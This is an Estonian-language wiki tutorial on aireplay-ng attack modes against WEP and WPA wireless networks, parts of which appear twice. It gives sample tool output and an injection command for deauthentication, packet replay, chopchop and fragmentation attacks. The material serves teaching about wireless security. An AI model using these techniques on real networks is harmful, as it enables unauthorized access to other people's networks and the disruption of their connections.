Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T10:51:31Z

Tliiv: /* Rünnak 7: Client-oriented fragmentation attack */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
